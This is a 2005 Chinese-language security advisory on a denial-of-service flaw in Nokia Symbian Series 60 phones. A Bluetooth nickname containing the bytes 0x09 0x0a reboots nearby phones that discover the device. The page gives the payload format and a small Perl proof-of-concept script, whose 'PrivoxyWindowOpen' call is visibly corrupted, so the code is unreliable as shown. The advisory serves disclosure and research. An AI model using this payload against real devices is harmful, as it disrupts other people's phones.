Nokia Symbian 60系列蓝牙昵称拒绝服务漏洞
发布日期:2005-06-28
更新日期:2005-06-28
受影响系统:Nokia 60系列手机
描述:
BUGTRAQ ID:
12743
Nokia是世界上最大的手机生产商,Symbia 60是某些Nokia手机搭载的操作系统。
Symbian 60操作系统存在远程拒绝服务漏洞,攻击者可以利用此漏洞使受害的手机重启。
起因是操作系统不能处理畸形的网络数据。在使用蓝牙设备时,如果用户的昵称为16进制" 09 0a "的话,就可能导致其他搜索到该设备用户的Nokia手机重启。
导致重启的昵称如下:
[任意内容][16进制的09 0a][任意内容]
必须在09 0a前添加任意内容,因为nokia手机以为09 0a是末尾的空间,会将其删除。
<*来源:Qnix (
Qnix@bsdmail.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=111989132510547&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n*******************************************************\n";
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";
print "** BY QNIX | Q-nix[@]bsdmail[dot]org **\n";
print "*******************************************************\n";
print " \n write your nickname : ";
$btnick = <STDIN>;
chomp($btnick);
print " \n OUTPUT : ";
$file = <STDIN>;
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n Done !! , send the output to your nokia and copy the file to the bluetooth \
nickname space . \n\n";
-------------end-----------------
建议:
厂商补丁:
Nokia
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nokia.com浏览次数:3539
严重程度:0(网友投票)
